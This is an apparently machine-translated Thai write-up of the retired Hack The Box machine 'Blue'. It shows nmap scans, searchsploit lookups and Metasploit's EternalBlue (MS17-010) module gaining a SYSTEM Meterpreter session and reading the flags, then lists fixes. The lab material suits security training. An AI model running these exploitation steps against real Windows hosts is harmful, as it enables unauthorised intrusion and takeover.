รักษาความสงบและแฮ็คกล่อง - สีน้ำเงิน

Hack The Box (HTB) เป็นแพลตฟอร์มออนไลน์ที่ให้คุณทดสอบทักษะการทดสอบการเจาะ

มันมีความท้าทายหลายอย่างที่อัปเดตอยู่ตลอดเวลา บางคนจำลองสถานการณ์ในโลกแห่งความเป็นจริงและบางส่วนก็โน้มน้าวไปสู่รูปแบบการท้าทาย CTF

หมายเหตุ : อนุญาตให้เขียนเฉพาะเครื่อง HTB ที่เลิกใช้งานแล้วเท่านั้น

Blue เป็นหนึ่งในเครื่องที่ง่ายที่สุดใน Hack The Box แต่มันแสดงให้เห็นถึงผลกระทบของการหาประโยชน์จาก EternalBlue ซึ่งถูกใช้เพื่อประนีประนอม บริษัท ต่างๆผ่านแรนซัมแวร์ขนาดใหญ่และการโจมตีด้วยการขุดคริปโต

เราจะใช้เครื่องมือต่อไปนี้เพื่อจำนำกล่องบนกล่อง Kali Linux:

  • nmap
  • ค้นหา
  • metasploit
  • มิเตอร์

มาเริ่มกันเลย.

ก่อนอื่นฉันเพิ่มBlueในไฟล์ / etc / hosts

nano /etc/hosts

ด้วย

10.10.10.40 blue.htb

ขั้นตอนที่ 1 - การลาดตระเวน

ขั้นตอนแรกก่อนที่จะใช้ประโยชน์จากเครื่องจักรคือการสแกนและการลาดตระเวนเล็กน้อย

นี่เป็นหนึ่งในส่วนที่สำคัญที่สุดเนื่องจากจะกำหนดสิ่งที่คุณสามารถพยายามใช้ประโยชน์ได้ในภายหลัง จะดีกว่าเสมอหากใช้เวลามากขึ้นในช่วงนี้เพื่อรับข้อมูลให้มากที่สุดเท่าที่จะทำได้

การสแกนพอร์ต

ฉันจะใช้Nmap (Network Mapper) Nmap เป็นยูทิลิตี้โอเพ่นซอร์สฟรีสำหรับการค้นหาเครือข่ายและการตรวจสอบความปลอดภัย

ใช้แพ็คเก็ต IP ดิบเพื่อตรวจสอบว่าโฮสต์ใดที่มีอยู่บนเครือข่ายบริการใดที่โฮสต์เหล่านั้นนำเสนอระบบปฏิบัติการที่พวกเขากำลังทำงานอยู่ประเภทของตัวกรองแพ็กเก็ต / ไฟร์วอลล์ที่ใช้งานอยู่และคุณสมบัติอื่น ๆ อีกมากมาย

มีคำสั่งมากมายที่คุณสามารถใช้กับเครื่องมือนี้เพื่อสแกนเครือข่าย หากคุณต้องการเรียนรู้เพิ่มเติมคุณสามารถดูเอกสารประกอบได้ที่นี่

ฉันใช้คำสั่งต่อไปนี้เพื่อทำการสแกนแบบเข้มข้น:

nmap -A -v blue.htb

-A:เปิดใช้งานการตรวจจับระบบปฏิบัติการการตรวจจับเวอร์ชันการสแกนสคริปต์และการสืบค้นกลับ

-v:เพิ่มระดับการใช้คำฟุ่มเฟือย

blue .htb:ชื่อโฮสต์สำหรับกล่องสีน้ำเงิน

หากคุณพบว่าผลลัพธ์ค่อนข้างแย่เกินไปคุณสามารถลองสิ่งนี้:

nmap blue.htb

เราจะเห็นว่ามีพอร์ตที่เปิดอยู่ค่อนข้างน้อย ได้แก่ :

พอร์ต 445, Microsoft-DS (Directory Services) การแชร์ไฟล์ SMB

จากการสแกน nmap เรามีข้อมูลบางอย่างเกี่ยวกับชื่อคอมพิวเตอร์ (haris-PC) และเวอร์ชัน SMB (2.02)

Server Message Block (SMB) เป็นโปรโตคอลเครือข่ายที่ช่วยให้ผู้ใช้สามารถสื่อสารกับคอมพิวเตอร์ระยะไกลและเซิร์ฟเวอร์เพื่อใช้ทรัพยากรหรือแชร์เปิดและแก้ไขไฟล์

จากชื่อของกล่องนี้และเป็นเครื่อง Windows ที่เปิดพอร์ต 445 เราสามารถสันนิษฐานได้ว่าเครื่องมีความเสี่ยงต่อ EternalBlue ฉันใช้สคริปต์ nmap เพื่อตรวจสอบข้อมูลนี้ด้วยสิ่งต่อไปนี้:

nmap --script vuln -p 445 blue.htb

เราจะเห็นได้ว่ากล่องดังกล่าวมีช่องโหว่จากช่องโหว่ Remote Code Execution ในเซิร์ฟเวอร์ Microsoft SMBv1 (ms17-010)

ขั้นตอนที่ 2 - ทำความเข้าใจ ms17-010

ms17-010 คืออะไร?

EternalBlueเป็นช่องโหว่ทางไซเบอร์ที่พัฒนาโดย US National Security Agency (NSA) รั่วไหลโดยกลุ่มแฮ็กเกอร์ Shadow Brokers เมื่อวันที่ 14 เมษายน 2017 หนึ่งเดือนหลังจากที่ Microsoft ปล่อยแพตช์สำหรับช่องโหว่ - Wikipedia

คุณสามารถอ่านเพิ่มเติมได้ที่นี่ ช่องโหว่นี้ได้รับการแก้ไขแล้วและอยู่ในรายการ Security Bulletin ของ Microsoft เป็น MS17-010

EternalBlue ช่วยให้แฮ็กเกอร์สามารถรันโค้ดโดยพลการจากระยะไกลเพื่อเข้าถึงเครือข่าย มันใช้ประโยชน์จากช่องโหว่ในโปรโตคอล Windows OS SMB การใช้ประโยชน์สามารถทำลายเครือข่ายทั้งหมดและอุปกรณ์ที่เชื่อมต่ออยู่

มัลแวร์ที่ใช้ EternalBlue สามารถแพร่กระจายข้ามเครือข่ายได้ ในปี 2017 WannaCry ซึ่งเป็น crypto-ransomware ได้ใช้ EternalBlue ซึ่งแพร่กระจายไปทั่วเครือข่ายที่ติดไวรัสอุปกรณ์ที่เชื่อมต่อทั้งหมด

ขั้นตอนที่ 3 - ใช้ประโยชน์จาก EternalBlue

ฉันใช้Searchsploitเพื่อตรวจสอบว่ามีการใช้ประโยชน์ที่เป็นที่รู้จักหรือไม่ Searchsploit เป็นเครื่องมือค้นหาบรรทัดคำสั่งสำหรับ Exploit Database

ฉันใช้คำสั่งต่อไปนี้:

searchsploit eternalblue

ฉันสามารถรับรายละเอียดเพิ่มเติมเกี่ยวกับการหาประโยชน์ได้จาก:

searchsploit -x 41738.py

คุณยังสามารถตรวจสอบฐานข้อมูล Exploitเพื่อค้นหาการใช้ประโยชน์ได้

มีโมดูล Metasploit หนึ่งโมดูล

เราจะใช้Metasploitซึ่งเป็นกรอบการทดสอบการเจาะที่ทำให้การแฮ็กเป็นเรื่องง่าย เป็นเครื่องมือที่จำเป็นสำหรับผู้โจมตีและผู้ป้องกัน

ฉันเปิดMetasploit Frameworkบน Kali และมองหาคำสั่งที่ฉันควรใช้เพื่อหาประโยชน์

อย่าลืมอัปเดต Metasploit เมื่อคุณเปิดใช้งานด้วยคำสั่งนี้:

msfupdate

คุณยังสามารถตรวจสอบว่าเป้าหมายมีความเสี่ยงต่อ EternalBlue บน Metasploit โดยใช้ตัวช่วยหรือไม่ เริ่มต้นด้วยคำสั่งนี้:

search eternalblue

แล้วในกรณีนั้น

use 1

เลือก

auxiliary/scanner/smb/smb_ms17_010

คุณสามารถตรวจสอบตัวเลือกได้ด้วย

show options

และตั้งค่า RHOSTS ด้วย

set RHOSTS blue.htb

จากนั้นเรียกใช้ตัวช่วยด้วย

run

คุณจะเห็นว่าโฮสต์มีแนวโน้มที่จะเสี่ยงต่อ MS17-010!

ตอนนี้เรามาตรวจสอบการใช้ประโยชน์ด้วย

use 2

หรือคำสั่ง

exploit/windows/smb/ms17_010_eternalblue

เราจำเป็นต้องตั้งค่าตัวเลือกสำหรับ RHOSTS

และ LHOST - ของฉันคือ 10.10.14.24 คุณจะต้องตั้งค่าด้วย LHOST ของคุณเอง คุณสามารถตรวจสอบของคุณได้ที่นี่

ก่อนเรียกใช้การหาประโยชน์คุณสามารถตรวจสอบได้ที่นี่ว่าเครื่องมีช่องโหว่หรือไม่ซึ่งจะเรียกใช้อุปกรณ์เสริมที่เราใช้ก่อนหน้านี้ด้วยคำสั่ง

check

แล้วเรียกใช้ประโยชน์ด้วย

run

การใช้ประโยชน์ต้องทำงานหลายครั้งก่อนที่ฉันจะได้เซสชันMeterpreter

นี่คือคำจำกัดความของ Meterpreter จาก Offensive Security:

Meterpreter เป็นเพย์โหลดขั้นสูงที่ขยายได้แบบไดนามิกซึ่งใช้สเตเจอร์การฉีด DLL ในหน่วยความจำและขยายผ่านเครือข่ายเมื่อรันไทม์ มันสื่อสารผ่านซ็อกเก็ต stager และให้ Ruby API ฝั่งไคลเอ็นต์ที่ครอบคลุม มันมีประวัติคำสั่งการเติมแท็บช่องและอื่น ๆ

คุณสามารถอ่านเพิ่มเติมเกี่ยวกับ Meterpreter ได้ที่นี่

เริ่มต้นด้วยการรวบรวมข้อมูล

getuidส่งคืน ID ผู้ใช้จริงของกระบวนการโทร

NT Authority \ SYSTEMหรือบัญชี LocalSystem เป็นบัญชี Windows ในตัว เป็นบัญชีที่ทรงพลังที่สุดในอินสแตนซ์ภายในของ Windows เรามีสิทธิ์เข้าถึงระดับผู้ดูแลระบบบนเครื่องนั้น

ขั้นตอนที่ 4 -ค้นหาแฟล็ก user.txt

ผมไปที่harisโฟลเดอร์จากDocuments and Settings

ฉันสามารถแสดงรายการไฟล์ / โฟลเดอร์ทั้งหมดด้วยคำสั่งต่อไปนี้:

ls -la

จากนั้นย้ายไปที่เดสก์ท็อปด้วย

cd Desktop

และฉันพบว่าผู้ใช้ตั้งค่าสถานะ! ฉันสามารถตรวจสอบเนื้อหาของไฟล์ด้วยไฟล์

cat user.txt

ขั้นตอนที่ 5 -ค้นหาแฟล็ก root.txt

มาค้นหาค่าสถานะรากตอนนี้ ฉันนำทางไปยังผู้ใช้และเช็คอินไปที่โฟลเดอร์Administrator / Desktop ฉันหาธง!

ฉันใช้คำสั่งต่อไปนี้เพื่อดูเนื้อหาของไฟล์:

cat root.txt

ยินดีด้วย! คุณพบธงทั้งสอง

การแก้ไข

  • แก้ไขอุปกรณ์ของคุณด้วยการอัปเดตความปลอดภัยสำหรับ Microsoft Windows SMB v1 คุณสามารถตรวจสอบ Microsoft Security Bulletin เพื่อดูว่าระบบปฏิบัติการใดได้รับผลกระทบ
  • ปิดใช้งาน SMB v1 และใช้ SMB v2 หรือ v3
  • ใช้หลักการของสิทธิพิเศษน้อยที่สุดกับระบบและบริการทั้งหมดของคุณ

โปรดอย่าลังเลที่จะแสดงความคิดเห็นถามคำถามหรือแบ่งปันกับเพื่อนของคุณ :)

คุณสามารถดูบทความเพิ่มเติมจากซีรีส์Keep Calm and Hack the Box ได้ที่นี่

คุณสามารถติดตามฉันได้ทาง Twitter หรือบน LinkedIn

และอย่าลืม # GetSecure , # BeSecure & # StaySecure !